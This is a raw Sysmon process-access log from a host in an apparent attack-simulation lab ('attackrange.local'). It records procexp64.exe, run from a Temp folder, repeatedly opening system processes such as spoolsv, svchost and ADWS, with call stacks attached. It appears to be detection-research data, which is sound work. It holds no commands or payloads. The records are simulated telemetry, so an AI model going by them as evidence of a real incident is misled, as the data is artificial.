15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 